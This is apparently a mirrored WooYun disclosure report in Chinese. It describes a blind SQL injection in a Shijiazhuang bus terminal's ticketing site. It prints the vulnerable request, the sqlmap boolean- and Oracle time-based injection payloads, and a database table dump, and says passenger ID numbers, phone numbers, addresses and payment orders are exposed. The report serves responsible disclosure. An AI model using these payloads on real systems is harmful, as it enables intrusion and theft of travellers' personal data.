石家庄客运总站某站点SQL注入(含旅客身份证号手机号住址订单时间去向)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-29: 厂商已经确认,细节仅向厂商公开
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

石家庄客运总站某站点SQL注入(含旅客身份证号\手机号\住址\订单时间去向)

详细说明:

 

code 区域
**.**.**.**/Register.jsp



0.png



检查用户是否存在

code 区域
GET **.**.**.**/CheckUserValue?userValue=test HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: **.**.**.**/Register.jsp
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)
Host: **.**.**.**
Connection: Keep-Alive
Cookie: JSESSIONID=34130A0B9F153505167935FA37380FC3



userValue参数存在注入

1.png



1=1.png



1=2.png



盲注,直接上SQLMAP

漏洞证明:

 

code 区域
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 9336=9336 AND 'CUrZ'='CUrZ

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: **.**.**.**:80/CheckUserValue?userValue=admin'and'1'='1' AND 5097=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(118)||CHR(85)||CHR(99),5) AND 'NaxB'='NaxB
---
back-end DBMS: Oracle
current schema (equivalent to database on Oracle): 'SJZWEB'



code 区域
Database: SJZWEB
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| TB_WEB_ERROR | 2980653 |
| TB_WEB_USER_LOG | 610631 |
| TB_WEB_LOG | 422999 |
| TB_IMAGE_VALID | 72548 |
| TB_WEB_ALIPAY | 69898 |
| TB_WEB_SEAT_LOCK | 33135 |
| TB_WEB_ORDER | 26011 |
| TB_WEB_USER | 16203 |
| TB_WEB_USER_ONLINE | 13147 |
| TB_WEB_MSG_SEND | 2033 |
| TB_WEB_ORDER_BUILD | 1191 |
| TB_CITY | 363 |
| TB_NEW_SCHEDULE | 172 |
| TB_WEB_TICKETSALE_UPD | 125 |
| TB_WEB_ALL_ROUTE | 101 |
| TB_PROVINCE | 34 |
| TB_WEB_PARAMETER | 13 |
| TB_WEB_AD | 8 |
| TB_WEB_NEW_SCHEDULE | 8 |
| TB_ANSWER_QUESTION | 6 |
| TB_GATEWAY | 1 |
| TB_WEB_DISCOUNT | 1 |
| TB_WEB_SALE_SCHEDULE | 1 |
| TB_WEB_SEATPASSWORD | 1 |
+-----------------------+---------+



用户登陆日志包含用户ip,session

log.png



用户订单界面,涵盖用户的支付宝订单号,出发地,登陆ip,付款金额,目的地站点名称等详细信息

截图20160427160526.png



修复方案:

过滤敏感字符

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-29 10:18

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:石家庄客运总站某站点SQL注入(含旅客身份证号手机号住址订单时间去向) - https://www.15qq.cn/wooyun/836.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知

评论

1条评论
  1. avatar

    还可以aa Lv.6 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    广西 移动数据上网公共出口